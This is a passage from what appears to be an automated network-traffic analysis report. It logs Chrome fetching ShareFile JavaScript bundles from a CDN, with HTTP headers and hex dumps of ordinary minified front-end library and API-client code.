                                                                                                                                                                                                                      Data Ascii: CircleSolidIcon",(function(e){var t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:"#4A9912";return i["default"].createElement("svg",{"data-replace-color":t,width:"24",height:"24",viewBox:"0 0 24 24",fill:"none"},i["default"].createElement("tit
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6c 65 73 21 22 2c 63 75 73 74 6f 6d 5f 65 6c 6c 69 70 73 69 73 3a 22 50 65 72 73 6f 6e 61 6c 69 7a 61 72 2e 2e 2e 22 2c 64 61 74 65 3a 7b 6a 75 6d 70 5f 62 61 63 6b 5f 6d 6f 6e 74 68 3a 22 52 65 74 72 6f 63 65 64 65 72 20 75 6e 20 6d 65 73 22 2c 6a 75 6d 70 5f 62 61 63 6b 5f 79 65 61 72 3a 22 52 65 74 72 6f 63 65 64 65 72 20 75 6e 20 61 c3 b1 6f 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 6d 6f 6e 74 68 3a 22 41 76 61 6e 7a 61 72 20 75 6e 20 6d 65 73 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 79 65 61 72 3a 22 41 76 61 6e 7a 61 72 20 75 6e 20 61 c3 b1 6f 22 2c 73 65 6c 65 63 74 5f 64 61 74 65 3a 22 53 65 6c 65 63 63 69 6f 6e 61 72 20 66 65 63 68 61 22 7d 2c 67 65 6e 65 72 69 63 5f 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 3a 22 53 65 20 68 61 20 70 72 6f
                                                                                                                                                                                                                      Data Ascii: les!",custom_ellipsis:"Personalizar...",date:{jump_back_month:"Retroceder un mes",jump_back_year:"Retroceder un ao",jump_forward_month:"Avanzar un mes",jump_forward_year:"Avanzar un ao",select_date:"Seleccionar fecha"},generic_error_message:"Se ha pro
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 45 78 63 65 6c 49 63 6f 6e 3a 22 45 78 63 65 6c 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 46 69 6c 65 62 6f 78 49 63 6f 6e 3a 22 46 69 6c 65 42 6f 78 22 2c 46 6c 61 73 68 49 63 6f 6e 3a 22 46 6c 61 73 68 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 46 6f 6c 64 65 72 49 63 6f 6e 3a 22 e3 83 95 e3 82 a9 e3 83 ab e3 83 80 e3 83 bc 22 2c 49 6c 6c 75 73 74 72 61 74 6f 72 49 63 6f 6e 3a 22 49 6c 6c 75 73 74 72 61 74 6f 72 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 49 6d 61 67 65 73 49 63 6f 6e 3a 22 e3 82 a4 e3 83 a1 e3 83 bc e3 82 b8 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 49 6e 64 65 73 69 67 6e 49 63 6f 6e 3a 22 49 6e 64 65 73 69 67 6e 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 49 6e 66 6f 49 63 6f 6e 3a
                                                                                                                                                                                                                      Data Ascii: ",ExcelIcon:"Excel ",FileboxIcon:"FileBox",FlashIcon:"Flash ",FolderIcon:"",IllustratorIcon:"Illustrator ",ImagesIcon:" ",IndesignIcon:"Indesign ",InfoIcon:
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 73 3d 5b 5d 2c 6c 3d 21 30 2c 63 3d 21 31 3b 74 72 79 7b 69 66 28 72 3d 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 29 2e 6e 65 78 74 2c 30 3d 3d 3d 74 29 7b 69 66 28 4f 62 6a 65 63 74 28 6e 29 21 3d 3d 6e 29 72 65 74 75 72 6e 3b 6c 3d 21 31 7d 65 6c 73 65 20 66 6f 72 28 3b 21 28 6c 3d 28 69 3d 72 2e 63 61 6c 6c 28 6e 29 29 2e 64 6f 6e 65 29 26 26 28 73 2e 70 75 73 68 28 69 2e 76 61 6c 75 65 29 2c 73 2e 6c 65 6e 67 74 68 21 3d 3d 74 29 3b 6c 3d 21 30 29 3b 7d 63 61 74 63 68 28 65 29 7b 63 3d 21 30 2c 6f 3d 65 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 69 66 28 21 6c 26 26 6e 75 6c 6c 21 3d 6e 5b 22 72 65 74 75 72 6e 22 5d 26 26 28 61 3d 6e 5b 22 72 65 74 75 72 6e 22 5d 28 29 2c 4f 62 6a 65 63 74 28 61 29 21 3d 3d 61 29 29 72 65 74 75 72 6e 7d 66 69 6e 61 6c 6c 79 7b
                                                                                                                                                                                                                      Data Ascii: s=[],l=!0,c=!1;try{if(r=(n=n.call(e)).next,0===t){if(Object(n)!==n)return;l=!1}else for(;!(l=(i=r.call(n)).done)&&(s.push(i.value),s.length!==t);l=!0);}catch(e){c=!0,o=e}finally{try{if(!l&&null!=n["return"]&&(a=n["return"](),Object(a)!==a))return}finally{
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 73 74 20 6e 3d 7b 2e 2e 2e 69 2c 74 79 70 65 3a 6e 75 6c 6c 21 3d 28 65 3d 6e 75 6c 6c 21 3d 28 74 3d 69 2e 72 65 66 65 74 63 68 54 79 70 65 29 3f 74 3a 69 2e 74 79 70 65 29 3f 65 3a 22 61 63 74 69 76 65 22 7d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 66 65 74 63 68 51 75 65 72 69 65 73 28 6e 2c 72 29 7d 29 29 7d 72 65 66 65 74 63 68 51 75 65 72 69 65 73 28 65 2c 74 2c 6e 29 7b 63 6f 6e 73 74 5b 69 2c 72 5d 3d 28 30 2c 6f 2e 62 5f 29 28 65 2c 74 2c 6e 29 2c 73 3d 61 2e 6a 2e 62 61 74 63 68 28 28 28 29 3d 3e 74 68 69 73 2e 71 75 65 72 79 43 61 63 68 65 2e 66 69 6e 64 41 6c 6c 28 69 29 2e 66 69 6c 74 65 72 28 28 65 3d 3e 21 65 2e 69 73 44 69 73 61 62 6c 65 64 28 29 29 29 2e 6d 61 70 28 28 65 3d 3e 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 65 2e 66 65 74
                                                                                                                                                                                                                      Data Ascii: st n={...i,type:null!=(e=null!=(t=i.refetchType)?t:i.type)?e:"active"};return this.refetchQueries(n,r)}))}refetchQueries(e,t,n){const[i,r]=(0,o.b_)(e,t,n),s=a.j.batch((()=>this.queryCache.findAll(i).filter((e=>!e.isDisabled())).map((e=>{var t;return e.fet
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6e 20 62 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 74 2e 70 72 65 76 3d 74 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 3d 22 22 2e 63 6f 6e 63 61 74 28 76 2e 6c 65 67 61 63 79 55 72 6c 2c 22 2f 76 31 2f 64 6f 63 75 6d 65 6e 74 5f 74 72 61 6e 73 61 63 74 69 6f 6e 73 22 29 2c 69 3d 7b 75 72 6c 3a 6e 2c 6d 65 74 68 6f 64 3a 22 70 6f 73 74 22 2c 64 61 74 61 3a 65 7d 2c 74 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 53 28 69 29 29 3b 63 61 73 65 20 33 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 74 2e 73 74 6f 70 28 29 7d 7d 29 2c 74 29 7d 29 29 29 7d 2c 75 70 64 61 74 65 44 6f 63 75 6d 65 6e 74 54 72 61 6e 73 61 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                      Data Ascii: n b().wrap((function(t){for(;;)switch(t.prev=t.next){case 0:return n="".concat(v.legacyUrl,"/v1/document_transactions"),i={url:n,method:"post",data:e},t.abrupt("return",S(i));case 3:case"end":return t.stop()}}),t)})))},updateDocumentTransaction:function(e
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 62 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 69 3d 22 22 2e 63 6f 6e 63 61 74 28 76 2e 6c 65 67 61 63 79 55 72 6c 2c 22 2f 76 31 2f 73 69 67 6e 65 72 73 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 70 61 73 73 63 6f 64 65 22 29 2c 6f 3d 7b 75 72 6c 3a 69 2c 6d 65 74 68 6f 64 3a 22 67 65 74 22 2c 70 61 72 61 6d 73 3a 74 7d 2c 6e 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 53 28 6f 29 29 3b 63 61 73 65 20 33 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6e 2e 73 74 6f 70 28 29 7d 7d 29 2c 6e 29 7d 29 29 29 7d 2c 63 68 65 63
                                                                                                                                                                                                                      Data Ascii: tion n(){var i,o;return b().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:return i="".concat(v.legacyUrl,"/v1/signers/").concat(e,"/passcode"),o={url:i,method:"get",params:t},n.abrupt("return",S(o));case 3:case"end":return n.stop()}}),n)})))},chec


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      21192.168.2.174973213.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC603OUTGET /sharefile-web/sharefiledev-task-mgt-pilet/1.7.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 199868
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 30 Jul 2024 08:42:51 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:07 GMT
                                                                                                                                                                                                                      ETag: "114e798d503a347aab2a537702e1593f"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 630336d6cdf08cf266841fd503dc03d0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: OxHFK0cTaF9bBrBEjDIi7EyvNFBqz3dVvl03RAfj75lOcTmPLnUpgg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 61 73 6b 6d 67 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtaskmgtpilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProp
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6f 63 54 68 75 6d 62 22 2c 65 5b 65 2e 43 61 6e 44 6f 63 50 72 65 76 69 65 77 3d 31 36 5d 3d 22 43 61 6e 44 6f 63 50 72 65 76 69 65 77 22 2c 65 5b 65 2e 52 65 71 75 69 72 65 73 50 72 65 76 69 65 77 3d 33 32 5d 3d 22 52 65 71 75 69 72 65 73 50 72 65 76 69 65 77 22 2c 65 5b 65 2e 50 72 6f 63 65 73 73 69 6e 67 3d 36 34 5d 3d 22 50 72 6f 63 65 73 73 69 6e 67 22 2c 65 5b 65 2e 46 61 69 6c 65 64 3d 31 32 38 5d 3d 22 46 61 69 6c 65 64 22 7d 28 79 7c 7c 28 79 3d 7b 7d 29 29 3b 76 61 72 20 76 2c 62 3d 7b 44 65 66 61 75 6c 74 3a 22 44 65 66 61 75 6c 74 22 2c 46 6f 6c 64 65 72 73 46 69 72 73 74 3a 22 46 6f 6c 64 65 72 73 46 69 72 73 74 22 2c 55 73 65 46 6f 6c 64 65 72 4f 70 74 69 6f 6e 73 3a 22 55 73 65 46 6f 6c 64 65 72 4f 70 74 69 6f 6e 73 22 7d 3b 21 66 75 6e 63
                                                                                                                                                                                                                      Data Ascii: ocThumb",e[e.CanDocPreview=16]="CanDocPreview",e[e.RequiresPreview=32]="RequiresPreview",e[e.Processing=64]="Processing",e[e.Failed=128]="Failed"}(y||(y={}));var v,b={Default:"Default",FoldersFirst:"FoldersFirst",UseFolderOptions:"UseFolderOptions"};!func
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 31 35 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 69 73 4f 62 6a 65 63 74 28 65 29 26 26 21 30 3d 3d 3d 65 2e 69 73 41 78 69 6f 73 45 72 72 6f 72 7d 7d 2c 35 37 35 34 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 34 35 31 35 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 2f 28 6d 73 69 65 7c 74 72 69 64 65 6e 74 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29
                                                                                                                                                                                                                      Data Ascii: 15);e.exports=function(e){return r.isObject(e)&&!0===e.isAxiosError}},57546:(e,t,n)=>{"use strict";var r=n(84515);e.exports=r.isStandardBrowserEnv()?function(){var e,t=/(msie|trident)/i.test(navigator.userAgent),n=document.createElement("a");function o(e)
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6f 6d 70 6c 65 74 65 7c 61 75 74 6f 50 6c 61 79 7c 63 61 70 74 75 72 65 7c 63 65 6c 6c 50 61 64 64 69 6e 67 7c 63 65 6c 6c 53 70 61 63 69 6e 67 7c 63 68 61 6c 6c 65 6e 67 65 7c 63 68 61 72 53 65 74 7c 63 68 65 63 6b 65 64 7c 63 69 74 65 7c 63 6c 61 73 73 49 44 7c 63 6c 61 73 73 4e 61 6d 65 7c 63 6f 6c 73 7c 63 6f 6c 53 70 61 6e 7c 63 6f 6e 74 65 6e 74 7c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 7c 63 6f 6e 74 65 78 74 4d 65 6e 75 7c 63 6f 6e 74 72 6f 6c 73 7c 63 6f 6e 74 72 6f 6c 73 4c 69 73 74 7c 63 6f 6f 72 64 73 7c 63 72 6f 73 73 4f 72 69 67 69 6e 7c 64 61 74 61 7c 64 61 74 65 54 69 6d 65 7c 64 65 63 6f 64 69 6e 67 7c 64 65 66 61 75 6c 74 7c 64 65 66 65 72 7c 64 69 72 7c 64 69 73 61 62 6c 65 64 7c 64 69 73 61 62 6c 65 50 69 63 74 75 72 65 49 6e 50
                                                                                                                                                                                                                      Data Ascii: omplete|autoPlay|capture|cellPadding|cellSpacing|challenge|charSet|checked|cite|classID|className|cols|colSpan|content|contentEditable|contextMenu|controls|controlsList|coords|crossOrigin|data|dateTime|decoding|default|defer|dir|disabled|disablePictureInP
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 3a 28 29 3d 3e 75 2c 54 69 3a 28 29 3d 3e 77 2c 59 4e 3a 28 29 3d 3e 66 2c 5a 50 3a 28 29 3d 3e 62 2c 5f 43 3a 28 29 3d 3e 68 2c 63 33 3a 28 29 3d 3e 6f 2c 65 43 3a 28 29 3d 3e 76 2c 65 6b 3a 28 29 3d 3e 64 2c 67 59 3a 28 29 3d 3e 6c 2c 68 65 3a 28 29 3d 3e 6d 2c 69 4e 3a 28 29 3d 3e 70 2c 6a 6b 3a 28 29 3d 3e 61 2c 6d 4b 3a 28 29 3d 3e 79 2c 6f 72 3a 28 29 3d 3e 67 2c 76 56 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 22 23 30 30 42 31 43 39 22 2c 6f 3d 22 23 30 30 43 38 45 33 22 2c 69 3d 22 23 31 34 32 45 33 32 22 2c 61 3d 22 23 39 31 35 33 44 41 22 2c 73 3d 22 23 45 42 35 30 35 30 22 2c 75 3d 22 23 32 43 31 44 31 44 22 2c 63 3d 22 23 46 39 39 33 34 42 22 2c 6c 3d 22 23 32 45 32 33 31 43 22 2c 64 3d 22 23 37 34 42 30 34 36 22 2c 66 3d 22 23 32 30 32 36
                                                                                                                                                                                                                      Data Ascii: :()=>u,Ti:()=>w,YN:()=>f,ZP:()=>b,_C:()=>h,c3:()=>o,eC:()=>v,ek:()=>d,gY:()=>l,he:()=>m,iN:()=>p,jk:()=>a,mK:()=>y,or:()=>g,vV:()=>i});var r="#00B1C9",o="#00C8E3",i="#142E32",a="#9153DA",s="#EB5050",u="#2C1D1D",c="#F9934B",l="#2E231C",d="#74B046",f="#2026
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 3b 66 6f 72 28 74 3d 30 3b 74 3c 36 34 3b 74 2b 3d 34 29 6e 5b 74 3e 3e 32 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 2b 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 31 29 3c 3c 38 29 2b 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 32 29 3c 3c 31 36 29 2b 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 33 29 3c 3c 32 34 29 3b 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 2c 6e 3d 5b 5d 3b 66 6f 72 28 74 3d 30 3b 74 3c 36 34 3b 74 2b 3d 34 29 6e 5b 74 3e 3e 32 5d 3d 65 5b 74 5d 2b 28 65 5b 74 2b 31 5d 3c 3c 38 29 2b 28 65 5b 74 2b 32 5d 3c 3c 31 36 29 2b 28 65 5b 74 2b 33 5d 3c 3c 32 34 29 3b 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69
                                                                                                                                                                                                                      Data Ascii: unction r(e){var t,n=[];for(t=0;t<64;t+=4)n[t>>2]=e.charCodeAt(t)+(e.charCodeAt(t+1)<<8)+(e.charCodeAt(t+2)<<16)+(e.charCodeAt(t+3)<<24);return n}function o(e){var t,n=[];for(t=0;t<64;t+=4)n[t>>2]=e[t]+(e[t+1]<<8)+(e[t+2]<<16)+(e[t+3]<<24);return n}functi
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 61 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 70 72 6f 74 6f 63 6f 6c 3a 6e 75 6c 6c 2c 75 73 65 72 6e 61 6d 65 3a 6e 75 6c 6c 2c 70 61 73 73 77 6f 72 64 3a 6e 75 6c 6c 2c 68 6f 73 74 6e 61 6d 65 3a 6e 75 6c 6c 2c 75 72 6e 3a 6e 75 6c 6c 2c 70 6f 72 74 3a 6e 75 6c 6c 2c 70 61 74 68 3a 6e 75 6c 6c 2c 71 75 65 72 79 3a 6e 75 6c 6c 2c 66 72 61 67 6d 65 6e 74 3a 6e 75 6c 6c 2c 70 72 65 76 65 6e 74 49 6e 76 61 6c 69 64 48 6f 73 74 6e 61 6d 65 3a 69 2e 70 72 65 76 65 6e 74 49 6e 76 61 6c 69 64 48 6f 73 74 6e 61 6d 65 2c 64 75 70 6c 69 63 61 74 65 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 73 3a 69 2e 64 75 70 6c 69 63 61 74 65 51 75 65 72 79 50 61 72 61 6d 65 74 65 72 73 2c 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 3a 69 2e 65 73 63
                                                                                                                                                                                                                      Data Ascii: arts=function(){return{protocol:null,username:null,password:null,hostname:null,urn:null,port:null,path:null,query:null,fragment:null,preventInvalidHostname:i.preventInvalidHostname,duplicateQueryParameters:i.duplicateQueryParameters,escapeQuerySpace:i.esc
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 72 6e 20 74 68 69 73 2e 62 75 69 6c 64 28 21 74 29 2c 74 68 69 73 7d 2c 61 2e 75 73 65 72 69 6e 66 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 29 72 65 74 75 72 6e 20 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 22 3a 74 68 69 73 3b 69 66 28 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 6e 3d 69 2e 62 75 69 6c 64 55 73 65 72 69 6e 66 6f 28 74 68 69 73 2e 5f 70 61 72 74 73 29 3b 72 65 74 75 72 6e 20 6e 3f 6e 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6e 2e 6c 65 6e 67 74 68 2d 31 29 3a 6e 7d 72 65 74 75 72 6e 22 40 22 21 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 28 65 2b 3d 22 40 22 29 2c 69 2e 70 61 72 73 65 55 73 65 72 69 6e 66 6f 28 65 2c 74 68 69 73 2e 5f 70 61 72 74 73 29 2c 74
                                                                                                                                                                                                                      Data Ascii: rn this.build(!t),this},a.userinfo=function(e,t){if(this._parts.urn)return e===undefined?"":this;if(e===undefined){var n=i.buildUserinfo(this._parts);return n?n.substring(0,n.length-1):n}return"@"!==e[e.length-1]&&(e+="@"),i.parseUserinfo(e,this._parts),t
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 6e 20 65 7d 2c 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 72 7d 29 7d 2c 32 35 32 36 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 6e 2e 64 28 74
                                                                                                                                                                                                                      Data Ascii: n e},r.apply(this,arguments)}n.d(t,{Z:()=>r})},25267:(e,t,n)=>{"use strict";function r(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}n.d(t
                                                                                                                                                                                                                      2024-11-05 19:36:07 UTC16384INData Raw: 74 72 69 6e 67 28 7b 66 69 6c 65 70 61 74 68 3a 74 2c 75 73 65 43 68 75 6e 6b 50 72 65 66 69 78 3a 6e 7d 29 2c 72 2e 6d 65 74 68 6f 64 28 22 50 4f 53 54 22 29 2c 72 7d 2c 65 2e 67 65 74 43 6c 6f 75 64 53 74 6f 72 61 67 65 4f 62 6a 65 63 74 4b 65 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 6f 2e 41 45 3b 72 65 74 75 72 6e 20 74 2e 66 72 6f 6d 28 22 49 74 65 6d 73 22 29 2c 74 2e 61 63 74 69 6f 6e 73 28 22 47 65 74 43 6c 6f 75 64 53 74 6f 72 61 67 65 4f 62 6a 65 63 74 4b 65 79 22 29 2c 74 2e 75 72 69 28 65 29 2c 74 2e 6d 65 74 68 6f 64 28 22 47 45 54 22 29 2c 74 7d 2c 65 2e 67 65 74 52 65 6c 61 74 69 6f 6e 73 68 69 70 46 6f 6c 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 65 77 20 6f 2e 41 45 3b 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: tring({filepath:t,useChunkPrefix:n}),r.method("POST"),r},e.getCloudStorageObjectKey=function(e){var t=new o.AE;return t.from("Items"),t.actions("GetCloudStorageObjectKey"),t.uri(e),t.method("GET"),t},e.getRelationshipFolder=function(e){var t=new o.AE;retu


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      22192.168.2.174973313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC608OUTGET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:06 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 221391
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 04 Dec 2023 08:50:04 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
